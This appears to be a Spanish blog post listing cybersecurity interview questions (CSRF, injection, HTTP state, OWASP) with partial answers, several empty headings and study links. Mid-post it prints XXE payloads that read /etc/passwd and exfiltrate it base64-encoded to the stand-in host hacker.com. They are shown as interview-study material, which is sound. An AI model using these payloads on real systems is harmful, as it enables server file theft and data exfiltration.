
Resumen de preguntas de entrevistas de ciberseguridad por las que he pasado, espero que esto ayude
Esta página es un resumen de las entrevistas por las que he pasado; cubrí una variedad considerable de roles, recibí múltiples rechazos, pero aprendí de cada entrevista, recopilé comentarios constructivos y seguí adelante. Espero que estas preguntas/consejos puedan ayudarte.
Los roles que cubre generalmente son los siguientes:
Consejo rápido:
He intentado anotar todas las preguntas posibles que he encontrado a continuación y he proporcionado respuestas para algunas. El resto puedes buscarlas en Google para obtener respuestas específicas y si quieres profundizar. Aparte de eso, hay algunas referencias al final, échales un vistazo. Fueron realmente útiles.
Me encantaría añadir más preguntas a medida que avance y revise mis notas; sin embargo, agradecería que me dieras una opinión constructiva contactándome a través de [email protected]. Si te encuentras con algo que no esté cubierto aquí, no dudes en compartirlo.
¿Qué es la tríada CIA?
¿Qué es AAA?
OWASP Top 10
¿Qué es XSS (Cross-site Scripting)?
¿Qué es CSRF?
Esta es la pregunta más dulce que a cualquier entrevistador le encantaría hacer
Consejo rápido: Sé breve; si te lo piden, solo entonces explica toda la historia
Cross-Site Request Forgery (CSRF) es un ataque que obliga a un usuario final a ejecutar acciones no deseadas en una aplicación web en la que está autenticado actualmente. Los ataques CSRF apuntan específicamente a solicitudes que cambian el estado, no al robo de datos, ya que el atacante no tiene forma de ver la respuesta a la solicitud falsificada. Con un poco de ayuda de la ingeniería social (como enviar un enlace por correo electrónico o chat), un atacante puede engañar a los usuarios de una aplicación web para que ejecuten acciones elegidas por el atacante. Si la víctima es un usuario normal, un ataque CSRF exitoso puede obligar al usuario a realizar solicitudes que cambian el estado, como transferir fondos, cambiar su dirección de correo electrónico, etc. Si la víctima es una cuenta administrativa, el CSRF puede comprometer toda la aplicación web.
Cómo combatir CSRF:
Usa tokens Anti-CSRF
Usa la política de mismo origen (same-origin policy)
Uso de la cabecera Referrer
¿Qué es la codificación HTML/URL?
¿Es el protocolo HTTP sin estado?
HTTP es inherentemente un protocolo sin estado; sin embargo, el servidor utiliza cookies para hacerlo con estado
¿Cuáles son los tipos de inyecciones: SQL, Comandos, SO?
Cómo combatir las inyecciones SQL:
Usa consultas parametrizadas y procedimientos almacenados
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
Para inyectar: document.xml
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
%remote; %intern; %xxe;
]>
<root>&xxe;</root> - you can change xxe entity to general entity
Host externo: http://hacker.com/evil.dtd
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
--- OR ---
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'file://%payl;'>"> - consider error-based
Hablaré en general en términos de AWS, aunque hay otros proveedores de nube como Azure, GCP, Digital Ocean, etc.
Recurso de aprendizaje:
https://regexone.com/ (¡Las expresiones regulares son imprescindibles!)
https://portswigger.net/web-security/
OWASP Top 10:
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
Preguntas de entrevistas de Infosec:
https://danielmiessler.com/study/infosec_interview_questions
Principales preguntas de Pentest:
https://resources.infosecinstitute.com/top-30-penetration-tester-pentester-interview-questions-and-answers-for-2019/#gref
Consejos de Python:
https://www.codementor.io/sheena/essential-python-interview-questions-du107ozr6
Guía de usuario de AWS:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
Información sobre SMB y Samba:
https://fitzcarraldoblog.wordpress.com/2016/10/17/a-correct-method-of-configuring-samba-for-browsing-smb-shares-in-a-home-network/